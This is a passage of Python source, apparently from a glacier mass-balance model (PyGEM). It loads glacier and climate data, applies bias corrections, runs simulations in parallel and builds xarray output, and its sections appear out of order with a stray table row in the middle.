    glac_wide_snowline = (glac_bin_snowpack > 0).argmax(axis=0)
    glac_wide_snowline[glac_wide_snowline > 0] = (elev_bins[glac_wide_snowline[glac_wide_snowline > 0]] -
                                                  input.binsize/2)
    glac_wide_area_annual = glac_bin_area_annual.sum(axis=0)
    glac_wide_volume_annual = (glac_bin_area_annual * glac_bin_icethickness_annual / 1000).sum(axis=0)
    # ELA: first bin (from the bottom) with positive climatic mass balance
    glac_wide_ELA_annual = (glac_bin_massbalclim_annual > 0).argmax(axis=0)
    glac_wide_ELA_annual[glac_wide_ELA_annual > 0] = (elev_bins[glac_wide_ELA_annual[glac_wide_ELA_annual > 0]] -
                                                      input.binsize/2)
    # ELA and snowline can't be below minimum elevation
    glac_zmin_annual = elev_bins[(glac_bin_area_annual > 0).argmax(axis=0)][:-1] - input.binsize/2
    glac_wide_ELA_annual[glac_wide_ELA_annual < glac_zmin_annual] = (
            glac_zmin_annual[glac_wide_ELA_annual < glac_zmin_annual])
    glac_zmin = elev_bins[(glac_bin_area > 0).argmax(axis=0)] - input.binsize/2
    glac_wide_snowline[glac_wide_snowline < glac_zmin] = glac_zmin[glac_wide_snowline < glac_zmin]
    return (glac_wide_temp, glac_wide_prec, glac_wide_acc, glac_wide_refreeze, glac_wide_melt,
            glac_wide_frontalablation, glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline,
            glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual)
def main(list_packed_vars):
    """
    Model simulation

    Parameters
    ----------
    list_packed_vars : list
        list of packed variables that enable the use of parallels
        [count, list of glacier numbers, regions string, gcm name]

    Returns
    -------
    netcdf files of the simulation output (specific output is dependent on the output option)
    """
    # Unpack variables
    count = list_packed_vars[0]
    glac_no = list_packed_vars[1]
    regions_str = list_packed_vars[2]
    gcm_name = list_packed_vars[3]
    parser = getparser()
    args = parser.parse_args()

    # Determine RCP scenario: an explicit -rcp argument wins; otherwise parse it from the
    # GCM list filename (assumed form '<prefix>_<rcp>_...').  For the reference GCM with no
    # -rcp argument, rcp_scenario is intentionally left undefined.
    if (gcm_name != input.ref_gcm_name) and (args.rcp is None):
        rcp_scenario = os.path.basename(args.gcm_list_fn).split('_')[1]
    elif args.rcp is not None:
        rcp_scenario = args.rcp

    if debug:
        if 'rcp_scenario' in locals():
            print(rcp_scenario)

    if args.debug_spc == 1:
        debug_spc = True
    else:
        debug_spc = False

    # ===== LOAD GLACIERS =====
    main_glac_rgi = modelsetup.selectglaciersrgitable(glac_no=glac_no)

    # Load glacier data for Huss and Farinotti to avoid repetitively reading the csv file (not needed for OGGM)
    if input.hyps_data in ['Huss', 'Farinotti']:
        # Glacier hypsometry [km**2], total area
        main_glac_hyps = modelsetup.import_Husstable(main_glac_rgi, input.hyps_filepath, input.hyps_filedict,
                                                     input.hyps_colsdrop)
        # Ice thickness [m], average
        main_glac_icethickness = modelsetup.import_Husstable(main_glac_rgi, input.thickness_filepath,
                                                             input.thickness_filedict, input.thickness_colsdrop)
        main_glac_icethickness[main_glac_icethickness < 0] = 0
        # Keep area and thickness consistent: bins with no ice carry no area
        main_glac_hyps[main_glac_icethickness == 0] = 0
        # Width [km], average
        main_glac_width = modelsetup.import_Husstable(main_glac_rgi, input.width_filepath, input.width_filedict,
                                                      input.width_colsdrop)

    # ===== TIME PERIOD =====
    dates_table = modelsetup.datesmodelrun(startyear=input.gcm_startyear, endyear=input.gcm_endyear,
                                           spinupyears=input.gcm_spinupyears, option_wateryear=input.gcm_wateryear)

    # ===== LOAD CLIMATE DATA =====
    # Set up climate class
    if gcm_name in ['ERA5', 'ERA-Interim', 'COAWST']:
        gcm = class_climate.GCM(name=gcm_name)
        # Check that end year is reasonable
        if (input.gcm_endyear > int(time.strftime("%Y"))) and (input.option_synthetic_sim == 0):
            print('\n\nEND YEAR BEYOND AVAILABLE DATA FOR ERA-INTERIM. CHANGE END YEAR.\n\n')
    else:
        # GCM object
        gcm = class_climate.GCM(name=gcm_name, rcp_scenario=rcp_scenario)
        # Reference GCM (used for bias corrections and derived climate variables)
        ref_gcm = class_climate.GCM(name=input.ref_gcm_name)
        # Adjust reference dates in event that reference is longer than GCM data
        if input.ref_startyear >= input.gcm_startyear:
            ref_startyear = input.ref_startyear
        else:
            ref_startyear = input.gcm_startyear
        if input.ref_endyear <= input.gcm_endyear:
            ref_endyear = input.ref_endyear
        else:
            ref_endyear = input.gcm_endyear
        dates_table_ref = modelsetup.datesmodelrun(startyear=ref_startyear, endyear=ref_endyear,
                                                   spinupyears=input.spinupyears,
                                                   option_wateryear=input.ref_wateryear)

    # Load climate data
    if input.option_synthetic_sim == 0:
        # Air temperature [degC]
        gcm_temp, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn, gcm.temp_vn, main_glac_rgi,
                                                                     dates_table)
        # Temperature standard deviation [degC] (only needed for ablation option 2)
        if input.option_ablation != 2:
            gcm_tempstd = np.zeros(gcm_temp.shape)
        elif input.option_ablation == 2 and gcm_name in ['ERA5']:
            gcm_tempstd, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.tempstd_fn, gcm.tempstd_vn,
                                                                            main_glac_rgi, dates_table)
        elif input.option_ablation == 2 and input.ref_gcm_name in ['ERA5']:
            # Compute temp std based on reference climate data
            ref_tempstd, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.tempstd_fn,
                                                                                ref_gcm.tempstd_vn,
                                                                                main_glac_rgi, dates_table_ref)
            # Monthly average from reference climate data
            gcm_tempstd = gcmbiasadj.monthly_avg_array_rolled(ref_tempstd, dates_table_ref, dates_table)
        else:
            gcm_tempstd = np.zeros(gcm_temp.shape)
        # Precipitation [m]
        gcm_prec, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn, gcm.prec_vn, main_glac_rgi,
                                                                     dates_table)
        # Elevation [m asl]
        gcm_elev = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn, gcm.elev_vn, main_glac_rgi)
        # Lapse rate
        if gcm_name in ['ERA-Interim', 'ERA5']:
            gcm_lr, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.lr_fn, gcm.lr_vn, main_glac_rgi,
                                                                       dates_table)
        else:
            # Compute lapse rates based on reference climate data
            ref_lr, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.lr_fn, ref_gcm.lr_vn,
                                                                           main_glac_rgi, dates_table_ref)
            # Monthly average from reference climate data
            gcm_lr = gcmbiasadj.monthly_avg_array_rolled(ref_lr, dates_table_ref, dates_table)
        # COAWST data has two domains, so need to merge the two domains
        if gcm_name == 'COAWST':
            gcm_temp_d01, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn_d01, gcm.temp_vn,
                                                                             main_glac_rgi, dates_table)
            gcm_prec_d01, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn_d01, gcm.prec_vn,
                                                                             main_glac_rgi, dates_table)
            gcm_elev_d01 = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn_d01, gcm.elev_vn, main_glac_rgi)
            # Check if glacier outside of high-res (d02) domain; fall back to the low-res (d01) data
            # (fixed: use logical 'not' instead of bitwise '~', which is always truthy on Python bools)
            for glac in range(main_glac_rgi.shape[0]):
                glac_lat = main_glac_rgi.loc[glac,input.rgi_lat_colname]
                glac_lon = main_glac_rgi.loc[glac,input.rgi_lon_colname]
                if (not (input.coawst_d02_lat_min <= glac_lat <= input.coawst_d02_lat_max) or
                        not (input.coawst_d02_lon_min <= glac_lon <= input.coawst_d02_lon_max)):
                    gcm_prec[glac,:] = gcm_prec_d01[glac,:]
                    gcm_temp[glac,:] = gcm_temp_d01[glac,:]
                    gcm_elev[glac] = gcm_elev_d01[glac]
    # ===== Synthetic Simulation =====
    elif input.option_synthetic_sim == 1:
        # Synthetic dates table
        dates_table_synthetic = modelsetup.datesmodelrun(
                startyear=input.synthetic_startyear, endyear=input.synthetic_endyear,
                option_wateryear=input.gcm_wateryear, spinupyears=0)
        # Air temperature [degC]
        gcm_temp_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn, gcm.temp_vn, main_glac_rgi,
                                                                          dates_table_synthetic)
        # Precipitation [m]
        gcm_prec_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn, gcm.prec_vn, main_glac_rgi,
                                                                          dates_table_synthetic)
        # Elevation [m asl]
        gcm_elev = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn, gcm.elev_vn, main_glac_rgi)
        # Lapse rate
        gcm_lr_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.lr_fn, gcm.lr_vn, main_glac_rgi,
                                                                        dates_table_synthetic)
        # Future simulation based on synthetic (replicated) data; add spinup years; dataset restarts after spinupyears
        datelength = dates_table.shape[0] - input.gcm_spinupyears * 12
        n_tiles = int(np.ceil(datelength / dates_table_synthetic.shape[0]))
        gcm_temp = np.append(gcm_temp_tile[:,:input.gcm_spinupyears*12],
                             np.tile(gcm_temp_tile,(1,n_tiles))[:,:datelength], axis=1)
        gcm_prec = np.append(gcm_prec_tile[:,:input.gcm_spinupyears*12],
                             np.tile(gcm_prec_tile,(1,n_tiles))[:,:datelength], axis=1)
        gcm_lr = np.append(gcm_lr_tile[:,:input.gcm_spinupyears*12],
                           np.tile(gcm_lr_tile,(1,n_tiles))[:,:datelength], axis=1)
        # Temperature std is not provided by the synthetic data; default to zero so the glacier
        # loop below (which indexes gcm_tempstd) does not fail with a NameError
        gcm_tempstd = np.zeros(gcm_temp.shape)
        # Temperature and precipitation sensitivity adjustments
        gcm_temp = gcm_temp + input.synthetic_temp_adjust
        gcm_prec = gcm_prec * input.synthetic_prec_factor

    # ===== BIAS CORRECTIONS =====
    # No adjustments
    if input.option_bias_adjustment == 0 or gcm_name == input.ref_gcm_name:
        gcm_temp_adj = gcm_temp
        gcm_prec_adj = gcm_prec
        gcm_elev_adj = gcm_elev
    # Bias correct based on reference climate data
    else:
        # Air temperature [degC], Precipitation [m], Elevation [masl], Lapse rate [K m-1]
        ref_temp, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.temp_fn, ref_gcm.temp_vn,
                                                                         main_glac_rgi, dates_table_ref)
        ref_prec, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.prec_fn, ref_gcm.prec_vn,
                                                                         main_glac_rgi, dates_table_ref)
        ref_elev = ref_gcm.importGCMfxnearestneighbor_xarray(ref_gcm.elev_fn, ref_gcm.elev_vn, main_glac_rgi)
        # OPTION 1: Adjust temp using Huss and Hock (2015), prec similar but addresses for variance and outliers
        if input.option_bias_adjustment == 1:
            # Temperature bias correction
            gcm_temp_adj, gcm_elev_adj = gcmbiasadj.temp_biasadj_HH2015(ref_temp, ref_elev, gcm_temp,
                                                                        dates_table_ref, dates_table)
            # Precipitation bias correction
            gcm_prec_adj, gcm_elev_adj = gcmbiasadj.prec_biasadj_opt1(ref_prec, ref_elev, gcm_prec,
                                                                      dates_table_ref, dates_table)
        # OPTION 2: Adjust temp and prec using Huss and Hock (2015)
        elif input.option_bias_adjustment == 2:
            # Temperature bias correction
            gcm_temp_adj, gcm_elev_adj = gcmbiasadj.temp_biasadj_HH2015(ref_temp, ref_elev, gcm_temp,
                                                                        dates_table_ref, dates_table)
            # Precipitation bias correction
            gcm_prec_adj, gcm_elev_adj = gcmbiasadj.prec_biasadj_HH2015(ref_prec, ref_elev, gcm_prec,
                                                                        dates_table_ref, dates_table)

    # Checks on precipitation data
    assert gcm_prec_adj.max() <= 10, 'gcm_prec_adj (precipitation bias adjustment) too high, needs to be modified'
    assert gcm_prec_adj.min() >= 0, 'gcm_prec_adj is producing a negative precipitation value'

    # ===== RUN MASS BALANCE =====
    # Number of simulations
    if input.option_calibration == 2:
        sim_iters = input.sim_iters
    else:
        sim_iters = 1

    for glac in range(main_glac_rgi.shape[0]):
        # Announce the first and last glacier processed
        # (fixed off-by-one: the loop index never equals shape[0], so the last glacier never printed)
        if glac == 0 or glac == main_glac_rgi.shape[0] - 1:
            print(gcm_name,':', main_glac_rgi.loc[main_glac_rgi.index.values[glac],'RGIId'])
        # Select subsets of data
        glacier_rgi_table = main_glac_rgi.loc[main_glac_rgi.index.values[glac], :]
        glacier_str = '{0:0.5f}'.format(glacier_rgi_table['RGIId_float'])
        glacier_gcm_elev = gcm_elev_adj[glac]
        glacier_gcm_prec = gcm_prec_adj[glac,:]
        glacier_gcm_temp = gcm_temp_adj[glac,:]
        glacier_gcm_tempstd = gcm_tempstd[glac,:]
        glacier_gcm_lrgcm = gcm_lr[glac,:]
        glacier_gcm_lrglac = glacier_gcm_lrgcm.copy()

        # ===== Load glacier data: area (km2), ice thickness (m), width (km) =====
        if input.hyps_data in ['oggm']:
            glac_oggm_df = pd.read_csv(input.oggm_glacierdata_fp + 'RGI60-' + glacier_str + '.csv', index_col=0)
            # area per bin [km2] = width [m] * flowline spacing [m] / 1e6
            glacier_area_initial = glac_oggm_df['w'].values * glac_oggm_df['dx'].values / 1e6
            icethickness_initial = glac_oggm_df['h'].values
            width_initial = glac_oggm_df['w'].values / 1e3
            elev_bins = glac_oggm_df['z'].values
        elif input.hyps_data in ['Huss', 'Farinotti']:
            glacier_area_initial = main_glac_hyps.iloc[glac,:].values.astype(float)
            icethickness_initial = main_glac_icethickness.iloc[glac,:].values.astype(float)
            width_initial = main_glac_width.iloc[glac,:].values.astype(float)
            elev_bins = main_glac_hyps.columns.values.astype(int)

        # Only run glaciers that have ice
        if icethickness_initial.max() > 0:
            # For hindcasts the climate forcing is reversed in time (outputs are re-reversed below)
            if input.hindcast == 1:
                glacier_gcm_prec = glacier_gcm_prec[::-1]
                glacier_gcm_temp = glacier_gcm_temp[::-1]
                glacier_gcm_lrgcm = glacier_gcm_lrgcm[::-1]
                glacier_gcm_lrglac = glacier_gcm_lrglac[::-1]

            # Model parameters: either imported per-glacier (e.g. calibrated MCMC chains) or the defaults
            if input.option_import_modelparams == 1:
                ds_mp = xr.open_dataset(input.modelparams_fp + glacier_str + '.nc')
                cn_subset = input.modelparams_colnames
                modelparameters_all = (pd.DataFrame(ds_mp['mp_value'].sel(chain=0).values,
                                                    columns=ds_mp.mp.values)[cn_subset])
            else:
                modelparameters_all = (
                        pd.DataFrame(np.asarray([input.lrgcm, input.lrglac, input.precfactor, input.precgrad,
                                                 input.ddfsnow, input.ddfice, input.tempsnow, input.tempchange])
                                     .reshape(1,-1), columns=input.modelparams_colnames))

            # Set the number of iterations and determine every kth iteration to use for the ensemble
            if input.option_calibration == 2 and modelparameters_all.shape[0] > 1:
                sim_iters = input.sim_iters
                # Select every kth iteration (random starting index within the first spacing window)
                mp_spacing = int((modelparameters_all.shape[0] - input.sim_burn) / sim_iters)
                mp_idx_start = np.arange(input.sim_burn, input.sim_burn + mp_spacing)
                np.random.shuffle(mp_idx_start)
                mp_idx_start = mp_idx_start[0]
                mp_idx_all = np.arange(mp_idx_start, modelparameters_all.shape[0], mp_spacing)
            else:
                sim_iters = 1

            # Loop through model parameters
            for n_iter in range(sim_iters):
                if sim_iters == 1:
                    modelparameters = modelparameters_all.mean()
                else:
                    mp_idx = mp_idx_all[n_iter]
                    modelparameters = modelparameters_all.iloc[mp_idx,:]

                if debug:
                    print(glacier_str, ('PF: ' + str(np.round(modelparameters[2],2)) + ' ddfsnow: ' +
                          str(np.round(modelparameters[4],4)) + ' tbias: ' + str(np.round(modelparameters[7],2))))
                # (removed leftover "DELETE ME" debug override that forced precfactor=5 and
                #  tempchange=-5 for every simulation, corrupting all results)

                # run mass balance calculation
                (glac_bin_temp, glac_bin_prec, glac_bin_acc, glac_bin_refreeze, glac_bin_snowpack, glac_bin_melt,
                 glac_bin_frontalablation, glac_bin_massbalclim, glac_bin_massbalclim_annual, glac_bin_area_annual,
                 glac_bin_icethickness_annual, glac_bin_width_annual, glac_bin_surfacetype_annual,
                 glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline, glac_wide_snowpack,
                 glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual, offglac_wide_prec,
                 offglac_wide_refreeze, offglac_wide_melt, offglac_wide_snowpack, offglac_wide_runoff) = (
                    massbalance.runmassbalance(modelparameters[0:8], glacier_rgi_table, glacier_area_initial,
                                               icethickness_initial, width_initial, elev_bins, glacier_gcm_temp,
                                               glacier_gcm_tempstd, glacier_gcm_prec, glacier_gcm_elev,
                                               glacier_gcm_lrgcm, glacier_gcm_lrglac, dates_table,
                                               option_areaconstant=0, hindcast=input.hindcast,
                                               debug=input.debug_mb, debug_refreeze=input.debug_refreeze))

                # Re-reverse outputs so hindcast results are in chronological order
                if input.hindcast == 1:
                    glac_bin_temp = glac_bin_temp[:,::-1]
                    glac_bin_prec = glac_bin_prec[:,::-1]
                    glac_bin_acc = glac_bin_acc[:,::-1]
                    glac_bin_refreeze = glac_bin_refreeze[:,::-1]
                    glac_bin_snowpack = glac_bin_snowpack[:,::-1]
                    glac_bin_melt = glac_bin_melt[:,::-1]
                    glac_bin_frontalablation = glac_bin_frontalablation[:,::-1]
                    glac_bin_massbalclim = glac_bin_massbalclim[:,::-1]
                    glac_bin_massbalclim_annual = glac_bin_massbalclim_annual[:,::-1]
                    glac_bin_area_annual = glac_bin_area_annual[:,::-1]
                    glac_bin_icethickness_annual = glac_bin_icethickness_annual[:,::-1]
                    glac_bin_width_annual = glac_bin_width_annual[:,::-1]
                    glac_bin_surfacetype_annual = glac_bin_surfacetype_annual[:,::-1]
                    glac_wide_massbaltotal = glac_wide_massbaltotal[::-1]
                    glac_wide_runoff = glac_wide_runoff[::-1]
                    glac_wide_snowline = glac_wide_snowline[::-1]
                    glac_wide_snowpack = glac_wide_snowpack[::-1]
                    glac_wide_area_annual = glac_wide_area_annual[::-1]
                    glac_wide_volume_annual = glac_wide_volume_annual[::-1]
                    glac_wide_ELA_annual = glac_wide_ELA_annual[::-1]
                    offglac_wide_prec = offglac_wide_prec[::-1]
                    offglac_wide_refreeze = offglac_wide_refreeze[::-1]
                    offglac_wide_melt = offglac_wide_melt[::-1]
                    offglac_wide_snowpack = offglac_wide_snowpack[::-1]
                    offglac_wide_runoff = offglac_wide_runoff[::-1]

    # Global variables for Spyder development (read by the __main__ plotting/processing section)
    if args.option_parallels == 0:
        global main_vars
        main_vars = inspect.currentframe().f_locals
#%% PARALLEL PROCESSING
if __name__ == '__main__':
    time_start = time.time()
    parser = getparser()
    args = parser.parse_args()

    # Verbose printing switch (-debug=1 on the command line)
    if args.debug == 1:
        debug = True
    else:
        debug = False

    # RGI glacier number
    # Priority: pickled list from the command line > input.glac_no > full RGI table selection
    if args.rgi_glac_number_fn is not None:
        with open(args.rgi_glac_number_fn, 'rb') as f:
            glac_no = pickle.load(f)
    elif input.glac_no is not None:
        glac_no = input.glac_no
    else:
        main_glac_rgi_all = modelsetup.selectglaciersrgitable(
                rgi_regionsO1=input.rgi_regionsO1, rgi_regionsO2 =input.rgi_regionsO2,
                rgi_glac_number=input.rgi_glac_number)
        glac_no = list(main_glac_rgi_all['rgino_str'].values)

    # Regions
    # Build a region identifier string (e.g. 'R1315') from the unique order-1 region numbers
    regions_str = 'R'
    for region in sorted(set([x.split('.')[0] for x in glac_no])):
        regions_str += str(region)

    # Number of cores for parallel processing (never more cores than glaciers)
    if args.option_parallels != 0:
        num_cores = int(np.min([len(glac_no), args.num_simultaneous_processes]))
    else:
        num_cores = 1

    # Glacier number lists to pass for parallel processing
    glac_no_lsts = split_glaciers.split_list(glac_no, n=num_cores, option_ordered=args.option_ordered)

    # Read GCM names from argument parser
    gcm_name = args.gcm_list_fn
    if args.gcm_name is not None:
        gcm_list = [args.gcm_name]
        rcp_scenario = args.rcp
    elif args.gcm_list_fn == input.ref_gcm_name:
        gcm_list = [input.ref_gcm_name]
        rcp_scenario = args.rcp
    else:
        with open(args.gcm_list_fn, 'r') as gcm_fn:
            gcm_list = gcm_fn.read().splitlines()
            # NOTE(review): assumes the list filename follows '<prefix>_<rcp>_...' — confirm naming convention
            rcp_scenario = os.path.basename(args.gcm_list_fn).split('_')[1]
            print('Found %d gcms to process'%(len(gcm_list)))

    # Loop through all GCMs
    for gcm_name in gcm_list:
        if args.rcp is None:
            print('Processing:', gcm_name)
        else:
            print('Processing:', gcm_name, rcp_scenario)
        # Pack variables for multiprocessing: [count, glacier list, regions string, gcm name]
        list_packed_vars = []
        for count, glac_no_lst in enumerate(glac_no_lsts):
            list_packed_vars.append([count, glac_no_lst, regions_str, gcm_name])

        # Parallel processing
        if args.option_parallels != 0:
            print('Processing in parallel with ' + str(args.num_simultaneous_processes) + ' cores...')
            with multiprocessing.Pool(args.num_simultaneous_processes) as p:
                p.map(main,list_packed_vars)
        # If not in parallel, then only should be one loop
        else:
            # Loop through the chunks and export bias adjustments
            for n in range(len(list_packed_vars)):
                main(list_packed_vars[n])

    print('Total processing time:', time.time()-time_start, 's')

    #%% ===== PLOTTING AND PROCESSING FOR MODEL DEVELOPMENT =====
    # Place local variables in variable explorer
    # NOTE(review): main() sets the global main_vars only when args.option_parallels == 0,
    # so this section is reachable only for serial (e.g. Spyder) development runs.
    if args.option_parallels == 0:
        main_vars_list = list(main_vars.keys())
        gcm_name = main_vars['gcm_name']
        main_glac_rgi = main_vars['main_glac_rgi']
        # main_glac_hyps = main_vars['main_glac_hyps']
        # main_glac_icethickness = main_vars['main_glac_icethickness']
        # main_glac_width = main_vars['main_glac_width']
        dates_table = main_vars['dates_table']
        if input.option_synthetic_sim == 1:
            dates_table_synthetic = main_vars['dates_table_synthetic']
            gcm_temp_tile = main_vars['gcm_temp_tile']
            gcm_prec_tile = main_vars['gcm_prec_tile']
            gcm_lr_tile = main_vars['gcm_lr_tile']
        gcm_temp = main_vars['gcm_temp']
        gcm_tempstd = main_vars['gcm_tempstd']
        gcm_prec = main_vars['gcm_prec']
        gcm_elev = main_vars['gcm_elev']
        gcm_lr = main_vars['gcm_lr']
        gcm_temp_adj = main_vars['gcm_temp_adj']
        gcm_prec_adj = main_vars['gcm_prec_adj']
        gcm_elev_adj = main_vars['gcm_elev_adj']
        gcm_temp_lrglac = main_vars['gcm_lr']
        # output_ds_all_stats = main_vars['output_ds_all_stats']
        # modelparameters = main_vars['modelparameters']
        glacier_rgi_table = main_vars['glacier_rgi_table']
        glacier_str = main_vars['glacier_str']
        # NOTE(review): 'glac_oggm_df' exists only when input.hyps_data == 'oggm'; this lookup
        # raises KeyError for Huss/Farinotti runs — confirm intended usage.
        glac_oggm_df = main_vars['glac_oggm_df']
        glacier_gcm_temp = main_vars['glacier_gcm_temp']
        glacier_gcm_tempstd = main_vars['glacier_gcm_tempstd']
        glacier_gcm_prec = main_vars['glacier_gcm_prec']
        glacier_gcm_elev = main_vars['glacier_gcm_elev']
        glacier_gcm_lrgcm = main_vars['glacier_gcm_lrgcm']
        glacier_gcm_lrglac = glacier_gcm_lrgcm
        glacier_area_initial = main_vars['glacier_area_initial']
        icethickness_initial = main_vars['icethickness_initial']
        width_initial = main_vars['width_initial']
        elev_bins = main_vars['elev_bins']
        glac_bin_frontalablation = main_vars['glac_bin_frontalablation']
        glac_bin_area_annual = main_vars['glac_bin_area_annual']
        glac_bin_massbalclim_annual = main_vars['glac_bin_massbalclim_annual']
        glac_bin_melt = main_vars['glac_bin_melt']
        glac_bin_acc = main_vars['glac_bin_acc']
        glac_bin_refreeze = main_vars['glac_bin_refreeze']
        glac_bin_snowpack = main_vars['glac_bin_snowpack']
        glac_bin_temp = main_vars['glac_bin_temp']
        glac_bin_prec = main_vars['glac_bin_prec']
        glac_bin_massbalclim = main_vars['glac_bin_massbalclim']
        glac_wide_massbaltotal = main_vars['glac_wide_massbaltotal']
        glac_wide_area_annual = main_vars['glac_wide_area_annual']
        glac_wide_volume_annual = main_vars['glac_wide_volume_annual']
        glac_wide_runoff = main_vars['glac_wide_runoff']
        # glac_wide_prec = main_vars['glac_wide_prec']
        # glac_wide_refreeze = main_vars['glac_wide_refreeze']
        modelparameters_all = main_vars['modelparameters_all']
        sim_iters = main_vars['sim_iters']
| 57.59207 | 122 | 0.599354 | """Run a model simulation."""
# Default climate data is ERA-Interim; specify CMIP5 by specifying a filename to the argument:
# (Command line) python run_simulation_list_multiprocess.py -gcm_list_fn=C:\...\gcm_rcpXX_filenames.txt
# - Default is running ERA-Interim in parallel with five processors.
# (Spyder) %run run_simulation_list_multiprocess.py C:\...\gcm_rcpXX_filenames.txt -option_parallels=0
# - Spyder cannot run parallels, so always set -option_parallels=0 when testing in Spyder.
# Built-in libraries
import argparse
import collections
import inspect
import multiprocessing
import os
import time
# External libraries
import pandas as pd
import pickle
import numpy as np
import xarray as xr
# Local libraries
import class_climate
import class_mbdata
import pygem_input as input
import pygemfxns_gcmbiasadj as gcmbiasadj
import pygemfxns_massbalance as massbalance
import pygemfxns_modelsetup as modelsetup
import spc_split_glaciers as split_glaciers
#%% FUNCTIONS
def getparser():
    """
    Build the command-line argument parser for the simulation script.

    Command-line options
    --------------------
    -gcm_list_fn : str
        text file that contains the climate data to be used in the model simulation
    -gcm_name : str
        gcm name
    -rcp : str
        representative concentration pathway (ex. 'rcp26')
    -num_simultaneous_processes : int
        number of cores to use in parallels
    -option_parallels : int
        switch to use parallels or not
    -rgi_glac_number_fn : str
        filename of .pkl file containing a list of glacier numbers used to run batches on the supercomputer
    -batch_number : int
        batch number used to differentiate output on supercomputer
    -option_ordered : int
        option to keep glaciers ordered or to grab every n value for the batch
        (the latter helps keep run times on each core similar by removing regional timing differences)
    -debug, -debug_spc : int
        switches for debug printing (default 0 is off)

    Returns
    -------
    argparse.ArgumentParser
        parser whose parse_args() yields the options above.
    """
    parser = argparse.ArgumentParser(description="run simulations from gcm list in parallel")
    # (flag, type, default, help) spec for every option; all use action='store'
    option_specs = [
        ('-gcm_list_fn', str, input.ref_gcm_name,
         'text file full of commands to run'),
        ('-gcm_name', str, None,
         'GCM name used for model run'),
        ('-rcp', str, None,
         'rcp scenario used for model run (ex. rcp26)'),
        ('-num_simultaneous_processes', int, 4,
         'number of simultaneous processes (cores) to use'),
        ('-option_parallels', int, 1,
         'Switch to use or not use parallels (1 - use parallels, 0 - do not)'),
        ('-rgi_glac_number_fn', str, None,
         'Filename containing list of rgi_glac_number, helpful for running batches on spc'),
        ('-batch_number', int, None,
         'Batch number used to differentiate output on supercomputer'),
        ('-option_ordered', int, 1,
         'switch to keep lists ordered or not'),
        ('-debug', int, 0,
         'Boolean for debugging to turn it on or off (default 0 is off'),
        ('-debug_spc', int, 0,
         'Boolean for debugging to turn it on or off (default 0 is off'),
    ]
    for flag, arg_type, arg_default, help_text in option_specs:
        parser.add_argument(flag, action='store', type=arg_type, default=arg_default, help=help_text)
    return parser
def calc_stats_array(data, stats_cns=input.sim_stat_cns):
    """
    Calculate statistics across the simulations (columns) of a 2D data array.

    Parameters
    ----------
    data : np.array
        2D array (rows: glacier/time values, columns: simulations); statistics are computed along axis 1
    stats_cns : list of str
        statistics to compute; any subset of
        'mean', 'std', '2.5%', '25%', 'median', '75%', '97.5%'

    Returns
    -------
    stats : np.array
        2D array with one column per requested statistic; columns always appear in the
        fixed order listed above, regardless of the order of stats_cns
    """
    # Fixed-order table of (column name, function) pairs; requested columns are
    # computed and stacked. This avoids the NameError the previous version raised
    # when 'mean' was not requested (stats was only initialized by the 'mean' branch).
    stat_funcs = [
        ('mean',   lambda d: d.mean(axis=1)),
        ('std',    lambda d: d.std(axis=1)),
        ('2.5%',   lambda d: np.percentile(d, 2.5, axis=1)),
        ('25%',    lambda d: np.percentile(d, 25, axis=1)),
        ('median', lambda d: np.median(d, axis=1)),
        ('75%',    lambda d: np.percentile(d, 75, axis=1)),
        ('97.5%',  lambda d: np.percentile(d, 97.5, axis=1)),
    ]
    cols = [func(data)[:, np.newaxis] for cn, func in stat_funcs if cn in stats_cns]
    stats = np.concatenate(cols, axis=1)
    return stats
def create_xrdataset(main_glac_rgi, dates_table, sim_iters=input.sim_iters, stat_cns=input.sim_stat_cns,
                     record_stats=0, option_wateryear=input.gcm_wateryear):
    """
    Create empty xarray dataset that will be used to record simulation runs.

    Parameters
    ----------
    main_glac_rgi : pandas dataframe
        dataframe containing relevant rgi glacier information
    dates_table : pandas dataframe
        table of the dates, months, days in month, etc.
    sim_iters : int
        number of simulation runs included
    stat_cns : list
        list of strings containing statistics that will be used on simulations
        (only used when record_stats=1)
    record_stats : int
        Switch to change from recording simulations (0) to statistics (1)
    option_wateryear : int
        switch that sets the 'year_type' attribute (1: water year, 2: calendar year,
        otherwise: custom year)

    Returns
    -------
    output_ds_all : xarray Dataset
        empty xarray dataset that contains variables and attributes to be filled in by simulation runs
    encoding : dictionary
        encoding used with exporting xarray dataset to netcdf
    """
    if input.output_package == 2:
        # Create empty datasets for each variable and merge them
        # Coordinate values
        output_variables = input.output_variables_package2
        glac_values = main_glac_rgi.index.values
        annual_columns = np.unique(dates_table['wateryear'].values)[0:int(dates_table.shape[0]/12)]
        time_values = dates_table.loc[input.spinupyears*12:dates_table.shape[0]+1,'date'].tolist()
        year_values = annual_columns[input.spinupyears:annual_columns.shape[0]]
        year_plus1_values = np.concatenate((annual_columns[input.spinupyears:annual_columns.shape[0]],
                                            np.array([annual_columns[annual_columns.shape[0]-1]+1])))
        # Year type for attributes
        if option_wateryear == 1:
            year_type = 'water year'
        elif option_wateryear == 2:
            year_type = 'calendar year'
        else:
            year_type = 'custom year'
        # Switch to record simulations or statistics
        if record_stats == 0:
            record_name = 'sim'
            record_name_values = np.arange(0,sim_iters)
        elif record_stats == 1:
            record_name = 'stats'
            # Use the stat_cns parameter (previously input.sim_stat_cns was read directly,
            # silently ignoring the argument)
